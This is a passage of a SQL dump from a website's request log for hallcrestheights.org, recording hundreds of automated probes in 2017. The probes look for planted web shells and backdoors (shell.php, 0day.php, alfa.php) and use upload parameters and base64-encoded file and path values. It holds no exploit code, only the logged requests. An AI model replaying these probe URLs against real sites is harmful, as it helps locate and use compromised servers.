00:00:00'),(12302,'http://hallcrestheights.org/components/com_mailto/views/mailto/yuekd.php',NULL,'http://site.ru','',4,0,'2017-10-30 08:31:10','0000-00-00 00:00:00'),(12303,'http://hallcrestheights.org/images/vivoui.php',NULL,'http://site.ru','',2,0,'2017-10-30 08:34:55','0000-00-00 00:00:00'),(12304,'http://hallcrestheights.org/trudsovet1/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_lightview/css/lightview/skins/dark/IwEadz.php',NULL,'http://site.ru','',2,0,'2017-10-30 09:38:32','0000-00-00 00:00:00'),(12305,'http://hallcrestheights.org/components/com_weblinks/views/category/tmpl/esef.php',NULL,'http://site.ru','',1,0,'2017-10-30 10:10:40','0000-00-00 00:00:00'),(12306,'http://hallcrestheights.org/templates/nulag.php',NULL,'http://site.ru','',3,0,'2017-10-30 10:43:00','0000-00-00 00:00:00'),(12307,'http://hallcrestheights.org/components/com_jce/editor/extensions/aggregator/youtube/htaccess.php',NULL,'http://site.ru','',3,0,'2017-10-30 12:35:45','0000-00-00 00:00:00'),(12308,'http://hallcrestheights.org/logs/avprvmx.php',NULL,'http://site.ru','',2,0,'2017-10-30 13:04:40','0000-00-00 00:00:00'),(12309,'http://hallcrestheights.org/cli/kcvald.php',NULL,'http://site.ru','',2,0,'2017-10-30 16:24:44','0000-00-00 00:00:00'),(12310,'http://hallcrestheights.org/media/gzovt.php',NULL,'http://site.ru','',3,0,'2017-10-30 17:10:37','0000-00-00 00:00:00'),(12311,'http://hallcrestheights.org/libraries/geteo.php',NULL,'http://site.ru','',1,0,'2017-10-30 18:19:35','0000-00-00 00:00:00'),(12312,'http://hallcrestheights.org/plugins/editors/yukesw.php',NULL,'http://site.ru','',3,0,'2017-10-30 20:01:56','0000-00-00 00:00:00'),(12313,'http://hallcrestheights.org/layouts/plugins/Dwsonv.php',NULL,'http://site.ru','',1,0,'2017-10-30 20:24:55','0000-00-00 00:00:00'),(12314,'http://hallcrestheights.org/modules/mod_itpgads_9722/plugins.php',NULL,'http://site.ru','',3,0,'2017-10-30 20:45:41','0000-00-00 00:00:00'),(12315,'http://hallcrestheights.org/components/com_phocaguestbook/jtlwrbc.php',NULL,'http://site.ru','',3,0,'2017-10-30 20:56:01','0000-00-00 00:00:00'),(12316,'http://hallcrestheights.org/plugins/finder/categories/tmhtvp.php',NULL,'http://site.ru','',4,0,'2017-10-30 20:57:15','0000-00-00 00:00:00'),(12317,'http://hallcrestheights.org/mambots/system/config.php',NULL,'http://site.ru','',1,0,'2017-10-30 22:42:18','0000-00-00 00:00:00'),(12318,'http://hallcrestheights.org/components/com_joomlawatch/css/Dfgsg.php',NULL,'http://site.ru','',3,0,'2017-10-31 00:01:22','0000-00-00 00:00:00'),(12319,'http://hallcrestheights.org/htaccess.php',NULL,'http://site.ru','',8,0,'2017-10-31 00:24:50','0000-00-00 00:00:00'),(12320,'http://hallcrestheights.org/store/asqrvj.php',NULL,'http://site.ru','',1,0,'2017-10-31 01:50:43','0000-00-00 00:00:00'),(12321,'http://hallcrestheights.org/sellerolux_407775878.php',NULL,'http://site.ru','',1,0,'2017-10-31 03:16:10','0000-00-00 00:00:00'),(12322,'http://hallcrestheights.org/media/jsqmf.php',NULL,'http://site.ru','',2,0,'2017-10-31 05:06:39','0000-00-00 00:00:00'),(12323,'http://hallcrestheights.org/images/packs/pack1/smile.php',NULL,'http://site.ru','',2,0,'2017-10-31 05:37:44','0000-00-00 00:00:00'),(12324,'http://hallcrestheights.org/sec.php',NULL,'http://site.ru','',5,0,'2017-10-31 07:30:52','0000-00-00 00:00:00'),(12325,'http://hallcrestheights.org/templates/bvqfmgz.php',NULL,'http://site.ru','',4,0,'2017-10-31 07:33:49','0000-00-00 00:00:00'),(12326,'http://hallcrestheights.org/libraries/css.php',NULL,'http://site.ru','',6,0,'2017-10-31 07:34:44','0000-00-00 00:00:00'),(12327,'http://hallcrestheights.org/modules/uazmdtt.php',NULL,'http://site.ru','',1,0,'2017-10-31 09:01:38','0000-00-00 00:00:00'),(12328,'http://hallcrestheights.org/modules/nkpenrd.php',NULL,'http://site.ru','',1,0,'2017-10-31 09:35:46','0000-00-00 00:00:00'),(12329,'http://hallcrestheights.org/00.php',NULL,'http://site.ru','',7,0,'2017-10-31 11:35:41','0000-00-00 00:00:00'),(12330,'http://hallcrestheights.org/components/com_tags/ugbhain.php',NULL,'http://site.ru','',3,0,'2017-10-31 11:50:18','0000-00-00 00:00:00'),(12331,'http://hallcrestheights.org/JEmobile.php',NULL,'http://site.ru','',1,0,'2017-10-31 12:16:16','0000-00-00 00:00:00'),(12332,'http://hallcrestheights.org/components/com_wrapper/qoejkya.php',NULL,'http://site.ru','',2,0,'2017-10-31 12:49:00','0000-00-00 00:00:00'),(12333,'http://hallcrestheights.org/authorize.php',NULL,'http://site.ru','',3,0,'2017-10-31 14:09:07','0000-00-00 00:00:00'),(12334,'http://hallcrestheights.org/media/bxydofq.php',NULL,'http://site.ru','',1,0,'2017-10-31 14:17:24','0000-00-00 00:00:00'),(12335,'http://hallcrestheights.org/includes/js/tabs/log.php',NULL,'http://site.ru','',5,0,'2017-10-31 15:39:26','0000-00-00 00:00:00'),(12336,'http://hallcrestheights.org/site/tmp/1.php',NULL,'http://site.ru','',4,0,'2017-10-31 15:59:03','0000-00-00 00:00:00'),(12337,'http://hallcrestheights.org/modules/fphofir.php',NULL,'http://site.ru','',3,0,'2017-10-31 20:24:18','0000-00-00 00:00:00'),(12338,'http://hallcrestheights.org/old_web/wp-admin/includes/images.php',NULL,'http://site.ru','',2,0,'2017-10-31 20:44:27','0000-00-00 00:00:00'),(12339,'http://hallcrestheights.org/plugins/vmpayment/klikandpay/klikandpay/assets/js/htaccess.php',NULL,'http://site.ru','',2,0,'2017-10-31 22:23:37','0000-00-00 00:00:00'),(12340,'http://hallcrestheights.org/components/com_sigpro/vhcptp.php',NULL,'http://site.ru','',1,0,'2017-10-31 22:34:05','0000-00-00 00:00:00'),(12341,'http://hallcrestheights.org/wp-content/uploads/FBO.php',NULL,'http://site.ru','',1,0,'2017-10-31 22:59:12','0000-00-00 00:00:00'),(12342,'http://hallcrestheights.org/plugins/installer/ddcwika.php',NULL,'http://site.ru','',2,0,'2017-10-31 23:05:46','0000-00-00 00:00:00'),(12343,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/code/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-01 00:19:36','0000-00-00 00:00:00'),(12344,'http://hallcrestheights.org/media/jui/img/bixck.php',NULL,'http://site.ru','',1,0,'2017-11-01 00:22:47','0000-00-00 00:00:00'),(12345,'http://hallcrestheights.org/images/sampledata/folio/alrskj.php',NULL,'http://site.ru','',1,0,'2017-11-01 00:46:24','0000-00-00 00:00:00'),(12346,'http://hallcrestheights.org/images/banners/voyqhvw.php',NULL,'http://site.ru','',4,0,'2017-11-01 00:57:54','0000-00-00 00:00:00'),(12347,'http://hallcrestheights.org/language/en-GB/indix.php',NULL,'http://site.ru','',4,0,'2017-11-01 02:29:04','0000-00-00 00:00:00'),(12348,'http://hallcrestheights.org/modules/mod_search/fcenkp.php',NULL,'http://site.ru','',1,0,'2017-11-01 03:20:32','0000-00-00 00:00:00'),(12349,'http://hallcrestheights.org/templates/themza_j15_19/tlwvoa.php',NULL,'http://site.ru','',2,0,'2017-11-01 04:39:10','0000-00-00 00:00:00'),(12350,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/template/css/lrliam.php',NULL,'http://site.ru','',4,0,'2017-11-01 05:13:07','0000-00-00 00:00:00'),(12351,'http://hallcrestheights.org/ssegtj/map.php',NULL,'http://site.ru','',1,0,'2017-11-01 05:16:11','0000-00-00 00:00:00'),(12352,'http://hallcrestheights.org/admin_index.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:00:16','0000-00-00 00:00:00'),(12353,'http://hallcrestheights.org/modules/mod_feed/mode.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:01:26','0000-00-00 00:00:00'),(12354,'http://hallcrestheights.org/components/com_newsfeeds/models/models.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:02:14','0000-00-00 00:00:00'),(12355,'http://hallcrestheights.org/components/com_search/models/finder.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:00:59','0000-00-00 00:00:00'),(12356,'http://hallcrestheights.org/medias.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:02:26','0000-00-00 00:00:00'),(12357,'http://hallcrestheights.org/components/com_search/models/content.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:02:49','0000-00-00 00:00:00'),(12358,'http://hallcrestheights.org/components/com_contact/models/config.php',NULL,'hallcrestheights.org','',1,0,'2017-11-01 08:02:20','0000-00-00 00:00:00'),(12359,'http://hallcrestheights.org/images/banners/admins.php',NULL,'http://site.ru','',1,0,'2017-11-01 08:12:25','0000-00-00 00:00:00'),(12360,'http://hallcrestheights.org/layouts/joomla/lwbzqzc.php',NULL,'http://site.ru','',2,0,'2017-11-01 10:18:12','0000-00-00 00:00:00'),(12361,'http://hallcrestheights.org/components/com_finder/qdedr.php',NULL,'http://site.ru','',3,0,'2017-11-01 10:58:27','0000-00-00 00:00:00'),(12362,'http://hallcrestheights.org/logs/pthtq.php',NULL,'http://site.ru','',1,0,'2017-11-01 11:50:12','0000-00-00 00:00:00'),(12363,'http://hallcrestheights.org/libraries/compat/qxjnpq.php',NULL,'http://site.ru','',2,0,'2017-11-01 13:38:26','0000-00-00 00:00:00'),(12364,'http://hallcrestheights.org/images/audio/Albums/shell123.php',NULL,'http://site.ru','',1,0,'2017-11-01 13:39:51','0000-00-00 00:00:00'),(12365,'http://hallcrestheights.org/libraries/cms/component/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-01 13:43:36','0000-00-00 00:00:00'),(12366,'http://hallcrestheights.org/components/com_fbb/uioflra.php',NULL,'http://site.ru','',1,0,'2017-11-01 17:24:17','0000-00-00 00:00:00'),(12367,'http://hallcrestheights.org/plugins/editors/tinymce/1.php',NULL,'http://site.ru','',1,0,'2017-11-01 17:41:50','0000-00-00 00:00:00'),(12368,'http://hallcrestheights.org/modules/mod_stats/rfziea.php',NULL,'http://site.ru','',1,0,'2017-11-01 18:24:36','0000-00-00 00:00:00'),(12369,'http://hallcrestheights.org/modules/mod_ariimageslider/wp-plugins.php',NULL,'http://site.ru','',4,0,'2017-11-01 18:44:18','0000-00-00 00:00:00'),(12370,'http://hallcrestheights.org/templates/t3_blank/images/themes/dark/ico/htaccess.php',NULL,'http://site.ru','',4,0,'2017-11-01 18:49:22','0000-00-00 00:00:00'),(12371,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/toor.php',NULL,'http://site.ru','',2,0,'2017-11-01 19:19:10','0000-00-00 00:00:00'),(12372,'http://hallcrestheights.org/templates/mhqcfpt.php',NULL,'http://site.ru','',4,0,'2017-11-01 19:24:11','0000-00-00 00:00:00'),(12373,'http://hallcrestheights.org/components/com_mailto/8tzae2.php',NULL,'http://site.ru','',1,0,'2017-11-01 20:08:58','0000-00-00 00:00:00'),(12374,'http://hallcrestheights.org/media/hyuzt.php',NULL,'http://site.ru','',1,0,'2017-11-01 20:38:10','0000-00-00 00:00:00'),(12375,'http://hallcrestheights.org/images/xcptjk.php',NULL,'http://site.ru','',1,0,'2017-11-01 20:56:54','0000-00-00 00:00:00'),(12376,'http://hallcrestheights.org/layouts/joomla/links/hkrlp.php',NULL,'http://site.ru','',3,0,'2017-11-02 00:40:41','0000-00-00 00:00:00'),(12377,'http://hallcrestheights.org/plugins/system/ldqza.php',NULL,'http://site.ru','',2,0,'2017-11-02 00:46:23','0000-00-00 00:00:00'),(12378,'http://hallcrestheights.org/plugins/aiudok.php',NULL,'http://site.ru','',4,0,'2017-11-02 01:35:43','0000-00-00 00:00:00'),(12379,'http://hallcrestheights.org/images/banners/uiajjt.php',NULL,'http://site.ru','',2,0,'2017-11-02 02:29:02','0000-00-00 00:00:00'),(12380,'http://hallcrestheights.org/modules/mod_ariimageslider/shell.php',NULL,'http://site.ru','',6,0,'2017-11-02 02:53:33','0000-00-00 00:00:00'),(12381,'http://hallcrestheights.org/media/system_infos.php',NULL,'http://site.ru','',2,0,'2017-11-02 03:25:09','0000-00-00 00:00:00'),(12382,'http://hallcrestheights.org/templates/beez5/error.php',NULL,'http://site.ru','',3,0,'2017-11-02 04:07:22','0000-00-00 00:00:00'),(12383,'http://hallcrestheights.org/components/com_finder/views/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-02 04:42:35','0000-00-00 00:00:00'),(12384,'http://hallcrestheights.org/components/com_wrapper/xfracc.php',NULL,'http://site.ru','',1,0,'2017-11-02 06:07:33','0000-00-00 00:00:00'),(12385,'http://hallcrestheights.org/modules/mod_new/mod_new.php',NULL,'http://site.ru','',3,0,'2017-11-02 06:41:06','0000-00-00 00:00:00'),(12386,'http://hallcrestheights.org/libraries/cms/menu/ehysha.php',NULL,'http://site.ru','',4,0,'2017-11-02 06:54:27','0000-00-00 00:00:00'),(12387,'http://hallcrestheights.org/includes/bpkoxj.php',NULL,'http://site.ru','',2,0,'2017-11-02 08:42:09','0000-00-00 00:00:00'),(12388,'http://hallcrestheights.org/plugins/xsyhfq.php',NULL,'http://site.ru','',1,0,'2017-11-02 09:14:28','0000-00-00 00:00:00'),(12389,'http://hallcrestheights.org/shop/components/com_mailto/8tzae2.php',NULL,'http://site.ru','',2,0,'2017-11-02 09:53:32','0000-00-00 00:00:00'),(12390,'http://hallcrestheights.org/images/stories/virtuemart/category/resized/ini.php',NULL,'http://site.ru','',2,0,'2017-11-02 10:37:35','0000-00-00 00:00:00'),(12391,'http://hallcrestheights.org/images/1ndex.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:11:20','0000-00-00 00:00:00'),(12392,'http://hallcrestheights.org/cache/cachee.php?z3=UHF0NUZhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:11:17','0000-00-00 00:00:00'),(12393,'http://hallcrestheights.org/maill.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:12:12','0000-00-00 00:00:00'),(12394,'http://hallcrestheights.org/wp-cache.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:13:36','0000-00-00 00:00:00'),(12395,'http://hallcrestheights.org/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',13,0,'2017-11-02 12:12:20','0000-00-00 00:00:00'),(12396,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:14:41','0000-00-00 00:00:00'),(12397,'http://hallcrestheights.org/SessionController.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:14:44','0000-00-00 00:00:00'),(12398,'http://hallcrestheights.org/webconfig.txt.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:14:50','0000-00-00 00:00:00'),(12399,'http://hallcrestheights.org/mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:14:52','0000-00-00 00:00:00'),(12400,'http://hallcrestheights.org/robots.txt.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:15:25','0000-00-00 00:00:00'),(12401,'http://hallcrestheights.org/sql_dump.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:15:30','0000-00-00 00:00:00'),(12402,'http://hallcrestheights.org/jconfig.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:15:34','0000-00-00 00:00:00'),(12403,'http://hallcrestheights.org/thumb.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:15:36','0000-00-00 00:00:00'),(12404,'http://hallcrestheights.org/xmlrpc-activate.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:14:46','0000-00-00 00:00:00'),(12405,'http://hallcrestheights.org/al277.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:16:09','0000-00-00 00:00:00'),(12406,'http://hallcrestheights.org/images/al277.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:16:11','0000-00-00 00:00:00'),(12407,'http://hallcrestheights.org/wsdl.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:14:54','0000-00-00 00:00:00'),(12408,'http://hallcrestheights.org/wp-data.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:16:22','0000-00-00 00:00:00'),(12409,'http://hallcrestheights.org/wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',12,0,'2017-11-02 12:16:27','0000-00-00 00:00:00'),(12410,'http://hallcrestheights.org/media/1ndex.php?z3=UHF0NUZhLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:17:28','0000-00-00 00:00:00'),(12411,'http://hallcrestheights.org/media/tmp.php?z3=UHF0NUZhLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:17:32','0000-00-00 00:00:00'),(12412,'http://hallcrestheights.org/google-assist.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:17:59','0000-00-00 00:00:00'),(12413,'http://hallcrestheights.org/images/google-assist.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:19:45','0000-00-00 00:00:00'),(12414,'http://hallcrestheights.org/elements.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:19:49','0000-00-00 00:00:00'),(12415,'http://hallcrestheights.org/cache/defau1t.php?z3=UHF0NUZhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:19:52','0000-00-00 00:00:00'),(12416,'http://hallcrestheights.org/roubt.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:19:55','0000-00-00 00:00:00'),(12417,'http://hallcrestheights.org/bookmark.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:19:58','0000-00-00 00:00:00'),(12418,'http://hallcrestheights.org/media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',12,0,'2017-11-02 12:20:01','0000-00-00 00:00:00'),(12419,'http://hallcrestheights.org/libraries/joomla/juser.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',12,0,'2017-11-02 12:20:56','0000-00-00 00:00:00'),(12420,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:20:38','0000-00-00 00:00:00'),(12421,'http://hallcrestheights.org/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',12,0,'2017-11-02 12:22:38','0000-00-00 00:00:00'),(12422,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=UHF0NUZhLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:23:11','0000-00-00 00:00:00'),(12423,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:23:43','0000-00-00 00:00:00'),(12424,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:23:48','0000-00-00 00:00:00'),(12425,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:23:54','0000-00-00 00:00:00'),(12426,'http://hallcrestheights.org/cache/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',11,0,'2017-11-02 12:23:59','0000-00-00 00:00:00'),(12427,'http://hallcrestheights.org/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:24:00','0000-00-00 00:00:00'),(12428,'http://hallcrestheights.org/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',11,0,'2017-11-02 12:22:42','0000-00-00 00:00:00'),(12429,'http://hallcrestheights.org/A.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:24:26','0000-00-00 00:00:00'),(12430,'http://hallcrestheights.org/modules/modules/modules.php?z3=UHF0NUZhLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:24:27','0000-00-00 00:00:00'),(12431,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:24:31','0000-00-00 00:00:00'),(12432,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:24:34','0000-00-00 00:00:00'),(12433,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:24:37','0000-00-00 00:00:00'),(12434,'http://hallcrestheights.org/media/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',11,0,'2017-11-02 12:25:11','0000-00-00 00:00:00'),(12435,'http://hallcrestheights.org/wp-includes/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',8,0,'2017-11-02 12:23:52','0000-00-00 00:00:00'),(12436,'http://hallcrestheights.org/media/jmails.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',11,0,'2017-11-02 12:24:48','0000-00-00 00:00:00'),(12437,'http://hallcrestheights.org/images/stories/0day.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:27:10','0000-00-00 00:00:00'),(12438,'http://hallcrestheights.org/install.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:27:14','0000-00-00 00:00:00'),(12439,'http://hallcrestheights.org/goog1es.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:26:19','0000-00-00 00:00:00'),(12440,'http://hallcrestheights.org/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:27:42','0000-00-00 00:00:00'),(12441,'http://hallcrestheights.org/error-log.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:28:05','0000-00-00 00:00:00'),(12442,'http://hallcrestheights.org/xmlsrpc.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:28:07','0000-00-00 00:00:00'),(12443,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=UHF0NUZhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:26:48','0000-00-00 00:00:00'),(12444,'http://hallcrestheights.org/shootmei.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-02 12:26:51','0000-00-00 00:00:00'),(12445,'http://hallcrestheights.org/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:28:15','0000-00-00 00:00:00'),(12446,'http://hallcrestheights.org/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:28:16','0000-00-00 00:00:00'),(12447,'http://hallcrestheights.org/tmp/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:26:55','0000-00-00 00:00:00'),(12448,'http://hallcrestheights.org/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:29:09','0000-00-00 00:00:00'),(12449,'http://hallcrestheights.org/content.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:29:10','0000-00-00 00:00:00'),(12450,'http://hallcrestheights.org/images/sym.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:29:38','0000-00-00 00:00:00'),(12451,'http://hallcrestheights.org/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:28:19','0000-00-00 00:00:00'),(12452,'http://hallcrestheights.org/Abbrevsprl.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:30:13','0000-00-00 00:00:00'),(12453,'http://hallcrestheights.org/E.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:31:38','0000-00-00 00:00:00'),(12454,'http://hallcrestheights.org/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',9,0,'2017-11-02 12:31:41','0000-00-00 00:00:00'),(12455,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:32:04','0000-00-00 00:00:00'),(12456,'http://hallcrestheights.org/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:04','0000-00-00 00:00:00'),(12457,'http://hallcrestheights.org/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:06','0000-00-00 00:00:00'),(12458,'http://hallcrestheights.org/Jijle3.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:30:46','0000-00-00 00:00:00'),(12459,'http://hallcrestheights.org/auithorze.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:07','0000-00-00 00:00:00'),(12460,'http://hallcrestheights.org/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:08','0000-00-00 00:00:00'),(12461,'http://hallcrestheights.org/lou-bna.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:09','0000-00-00 00:00:00'),(12462,'http://hallcrestheights.org/images/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:11','0000-00-00 00:00:00'),(12463,'http://hallcrestheights.org/tmp/petx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:12','0000-00-00 00:00:00'),(12464,'http://hallcrestheights.org/RoseLeif.php?z3=UHF0NUZhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:32:34','0000-00-00 00:00:00'),(12465,'http://hallcrestheights.org/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:32:35','0000-00-00 00:00:00'),(12466,'http://hallcrestheights.org/up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=',NULL,'','',10,0,'2017-11-02 12:33:36','0000-00-00 00:00:00'),(12467,'http://hallcrestheights.org/images/xxx.php?z3=UHF0NUZhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-02 12:32:43','0000-00-00 